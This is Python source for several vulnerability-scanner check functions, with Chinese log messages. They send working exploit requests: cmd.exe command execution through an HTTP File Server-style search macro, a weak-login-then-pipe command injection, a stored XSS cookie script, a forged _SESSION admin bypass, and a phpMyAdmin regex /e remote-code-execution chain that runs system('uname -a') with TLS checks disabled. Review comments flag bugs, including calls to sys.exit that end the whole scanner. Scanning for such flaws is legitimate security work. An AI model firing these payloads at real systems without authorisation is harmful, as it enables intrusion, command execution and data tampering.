def verify(self):
    """Probe the target for server-side macro execution through the ``search`` parameter.

    Two GET requests are sent. The first carries a macro asking the server to
    run ``cmd.exe`` twice: delete a file named ``res``, then recreate it with
    the marker ``123456test``. The second carries a macro that loads ``res``
    into a cookie value. If the marker comes back in the ``Set-Cookie``
    header the server executed the commands and a finding is reported via
    ``self.output.report``; any exception is logged via ``self.output.info``
    and swallowed.

    Side effects: ``self.target`` is rewritten to include ``base_path``; on a
    susceptible host the file ``res`` in the server's working directory is
    deleted and rewritten.
    """
    self.target = self.target.rstrip('/') + '/' + self.get_option('base_path').lstrip('/')
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Macro sequence: drop any stale marker file, then write a fresh one.
        write_marker = ("/?search==%00{.exec|cmd.exe /c del res.}"
                        "{.exec|cmd.exe /c echo>res 123456test.}")
        # Macro that reflects the marker file back inside a cookie value.
        read_marker = "/?search==%00{.cookie|out|value={.load|res.}.}"
        base_url = self.target
        http = requests.Session()
        http.get(base_url + write_marker, headers={})
        reply = http.get(base_url + read_marker, headers={})
        # A missing or empty Set-Cookie header counts as "marker absent".
        cookie_header = reply.headers.get('set-cookie') or ""
        if "123456test" not in cookie_header:
            return
        self.output.report(
            self.vuln,
            '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Check for a fixed weak login and, if it succeeds, a command injection in ``/3g/g3/log``.

    The credentials in ``credentials`` are POSTed to ``/home/login``; a body of
    exactly ``'1'`` is treated as a successful login and reported as a weak
    password under ``self.vuln['auth']``. The same session then POSTs
    ``injected_line`` (a ``line`` field whose value pipes into ``echo``) to
    ``/3g/g3/log``; if ``vuln`` appears in the reply the command-execution
    finding is reported under ``self.vuln['rce']``. Exceptions are logged via
    ``self.output.info`` and swallowed.

    Side effect: ``self.target`` is rewritten to include ``base_path``.
    """
    self.target = self.target.rstrip('/') + '/' + self.get_option('base_path').lstrip('/')
    credentials = {'username': '******', 'password': '******'}
    injected_line = {'line': '1|echo \'vuln\''}
    try:
        # self.vuln: the vulnerabilities being scanned; self.target: the scan target.
        login_url = '{url}/home/login'.format(url=self.target)
        http = requests.Session()
        # self.output.info: execution / flow log lines.
        self.output.info('使用用户信息 {up} 访问 {path}'.format(path=login_url, up=credentials))
        login_reply = http.post(login_url, data=credentials)
        if login_reply.text != '1':
            return
        # self.output.warn: suspected finding for a specific vulnerability.
        self.output.warn(self.vuln['auth'], '发现弱口令 {up}'.format(up=credentials))
        log_url = self.target + '/3g/g3/log'
        self.output.info('发送 payload={0} 到 {1}'.format(injected_line, log_url))
        log_reply = http.post(log_url, data=injected_line)
        if 'vuln' in log_reply.text:
            # self.output.report: confirmed finding.
            self.output.report(
                self.vuln['rce'],
                "目标 {url} 存在 /3g/g3/log 任意命令执行漏洞".format(url=self.target))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Probe the album-edit form for stored XSS by saving a marker script as the album title.

    The session is primed with a GET to the edit page (carrying the form body
    and an empty-credential HTTP basic auth), the form is POSTed with
    ``albumtitle`` set to ``<script>console.log(document.cookie)</script>``,
    and the album page is fetched again. If the marker is echoed back verbatim
    the finding is reported through ``self.output.report``; any exception is
    logged via ``self.output.info`` and swallowed.

    Side effects: ``self.target`` is rewritten to include ``base_path``; on a
    susceptible host album ``302`` is overwritten with the fixed form values.
    """
    self.target = self.target.rstrip('/') + '/' + self.get_option('base_path').lstrip('/')
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        http = requests.Session()
        edit_page = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32'
        marker = '''<script>console.log(document.cookie)</script>'''
        edit_url = self.target + edit_page
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
            'Referer': self.target + edit_page,
            'X-Requested-With': 'XMLHttpRequest',
        }
        form = {
            'albumtitle': marker,
            'albumid': '302',
            'active': '',
            'albumcate': '2',
            'albumdescription': '',
            'type': 0,
            'password': '',
            'Submit': '确定',
        }
        # Empty username/password, exactly as the original probe sent them.
        basic_auth = requests.auth.HTTPBasicAuth('', '')
        # Prime the session; the GET also carries the form body and basic auth.
        http.get(edit_url, data=form, auth=basic_auth, headers=headers)
        # Submit the edit form with the marker as the album title.
        http.post(edit_url, data=form, headers=headers)
        # Read the album page back and look for the marker unescaped.
        listing = http.get('{}/usercpspacemanagealbum.aspx'.format(self.target), headers=headers)
        if marker in listing.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                target=self.target, name=self.vuln.name))
            return
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Check whether POSTed ``_SESSION[...]`` fields are honoured as an admin session.

    The raw body ``_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=...``
    is POSTed to ``/index.php`` and then to ``/admin/admin.php`` within one
    session. If the admin page contains both the
    ``admin_form.php?action=form_list&nav=list_order`` and
    ``admin_main.php?nav=main`` links, the admin panel was reached without
    credentials and the finding is reported together with the admin URL.
    Exceptions are logged via ``self.output.info`` and swallowed.

    Side effect: ``self.target`` is rewritten to include ``base_path``.
    """
    self.target = self.target.rstrip('/') + '/' + self.get_option('base_path').lstrip('/')
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Passed as a plain string so the body is sent verbatim (note the trailing CRLF).
        session_fields = ("_SESSION[login_in]=1&_SESSION[admin]=1"
                          "&_SESSION[login_time]=300000000000000000000000\r\n")
        http = requests.Session()
        http.post(self.target + "/index.php", data=session_fields)
        # login test
        admin_url = self.target + "/admin/admin.php"
        admin_page = http.post(admin_url, data=session_fields).text
        admin_markers = (
            "admin_form.php?action=form_list&nav=list_order",
            "admin_main.php?nav=main",
        )
        if all(marker in admin_page for marker in admin_markers):
            self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                target=self.target, name=self.vuln.name, url=admin_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Attempt the regex-replace command execution chain against a ``pma``-style login and print the outcome.

    Sequence, all in one session with TLS certificate verification disabled:

    1. POST empty credentials (``uname``/``upass``) to ``/?lang=en`` and
       scrape a 32-character ``token`` from the HTML.
    2. POST ``sql`` to ``/import.php`` to create table ``prgpwn`` in database
       ``test`` with one row (``UNHEX('302F6500')``); an "already exists"
       error is tolerated, any other error ends the process.
    3. POST to ``/tbl_find_replace.php`` with ``useRegex`` on, ``find`` set to
       ``0/e`` followed by a NUL escape and ``replaceWith`` set to ``payload``;
       whatever follows ``</a>`` in the JSON ``message`` is printed as the
       command output.

    Side effects: rewrites ``self.target``; on a susceptible server creates a
    table and runs ``uname -a``. Results and control flow go to stdout and
    ``sys.exit`` rather than ``self.output`` (see the review notes inline),
    so this check never returns normally.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        url_to_pma = self.target
        # Command substituted into the regex replacement on the server.
        payload = "system('uname -a');"
        # Empty credentials: the login below is attempted anonymously.
        uname = ''
        upass = ''
        db = 'test'
        token = False
        custom_table = False
        table = 'prgpwn'
        size = 32  # unused; the token slice below hard-codes 32
        s = requests.Session()
        # you can manually add proxy support it's very simple ;)
        # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
        # NOTE(review): disables TLS certificate verification for every request in this session.
        s.verify = False
        # Creates the helper table; '302F6500' is the hex of the single stored row.
        sql = '''CREATE TABLE `{0}` ( `first` varchar(10) CHARACTER SET utf8 NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); '''.format(table)
        resp = s.post(url_to_pma + "/?lang=en", dict(pma_username=uname, pma_password=upass))
        # NOTE(review): identity comparison against an int literal only works through
        # CPython's small-int cache and is a SyntaxWarning on 3.8+; this should be `==`.
        if resp.status_code is 200:
            # NOTE(review): find() returns -1 when "token=" is absent, so token_place
            # becomes 5 and a garbage slice is taken; the `is False` check below
            # therefore never fires for a missing token.
            token_place = resp.text.find("token=") + 6
            token = resp.text[token_place:token_place + 32]
        if token is False:
            # self.output.info("Cannot get valid authorization token.")
            # NOTE(review): SystemExit is not an Exception, so the handler below does
            # not catch it; this terminates the whole scanner process, not just this check.
            sys.exit(1)
        if custom_table is False:
            data = {
                "is_js_confirmed": "0",
                "db": db,
                "token": token,
                "pos": "0",
                "sql_query": sql,
                "sql_delimiter": ";",
                "show_query": "0",
                "fk_checks": "0",
                "SQL": "Go",
                "ajax_request": "true",
                "ajax_page_request": "true",
            }
            resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
            if resp.status_code == 200:
                # resp.json() is re-parsed on every access below.
                if "success" in resp.json():
                    if resp.json()["success"] is False:
                        # Pull the text between <code> and </code> out of the error HTML.
                        first = resp.json()["error"][resp.json()["error"].find("<code>") + 6:]
                        error = first[:first.find("</code>")]
                        if "already exists" in error:
                            # A leftover table from an earlier run is tolerated.
                            # NOTE(review): printed to stdout, bypassing self.output.
                            print(error)
                        else:
                            print(("ERROR: " + error))
                            # NOTE(review): exits the process (see note above).
                            sys.exit(1)
        # Find/replace request: useRegex plus a "/e" modifier in `find`, with the
        # command in `replaceWith`. The NUL escape is what the printed message
        # below refers to as the null byte in the regexp.
        exploit = {
            "db": db,
            "table": table,
            "token": token,
            "goto": "sql.php",
            "find": "0/e\0",
            "replaceWith": payload,
            "columnIndex": "0",
            "useRegex": "on",
            "submit": "Go",
            "ajax_request": "true"
        }
        resp = s.post(url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            # Everything after the closing anchor in `message` is treated as command output.
            result = resp.json()["message"][resp.json()["message"].find("</a>") + 8:]
            if len(result):
                # NOTE(review): printed to stdout and then exits the process.
                print(("result: " + result))
                sys.exit(0)
        print(
            "Exploit failed!\n"
            "Try to manually set exploit parameters like --table, --database and --token.\n"
            "Remember that servers with PHP version greater than 5.4.6"
            " is not exploitable, because of warning about null byte in regexp"
        )
        sys.exit(1)
        # NOTE(review): unreachable — every path above calls sys.exit(), so the
        # framework report is never emitted for this check.
        self.output.report(
            self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        # NOTE(review): SystemExit from the sys.exit() calls above is not caught here.
        self.output.info('执行异常:{}'.format(e))